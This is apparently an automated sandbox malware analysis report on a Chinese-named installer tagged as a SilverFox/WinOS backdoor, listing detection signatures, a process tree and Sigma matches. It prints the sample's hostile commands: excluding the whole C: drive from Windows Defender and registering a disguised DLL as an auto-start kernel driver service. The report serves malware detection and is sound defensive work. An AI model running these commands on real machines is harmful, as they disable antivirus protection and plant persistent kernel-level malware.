
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.7.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.7.exe
renamed because original name is a hash value
Original sample name: _2.0.7.exe
Analysis ID: 1579756
MD5: b7289fd08cd04c771fd7c9b06477601a
SHA1: a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
SHA256: a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: B7289FD08CD04C771FD7C9B06477601A)
    • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 7312 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7512 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: B7289FD08CD04C771FD7C9B06477601A)
        • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7600 cmdline: "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7684 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7784 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7664 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7884 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7900 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8148 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7452 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7764 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7864 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7328 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6420 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7716 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7664, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7664, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 7292, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7312, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Virustotal: Detection: 9%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 86.1% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1817031002.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1817308914.0000000003690000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 6_2_6CCF98B0 FindFirstFileA,FindClose,FindClose,6_2_6CCF98B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_005A6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_005A6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_005A7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_005A7496
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr; Strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr; Strings found in binary or memory:
  • http://www.metalinker.org/
  • http://www.metalinker.org/basic_string::_M_construct
  • https://aria2.github.io/
  • https://aria2.github.io/Usage:
  • https://github.com/aria2/aria2/issues
  • https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr; Strings found in binary or memory:
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr | Static PE information: section name: .j)q
Source: update.vac.6.dr | Static PE information: section name: .j)q
Source: updat4.vac.6.dr | Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD03F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB839CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD04B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
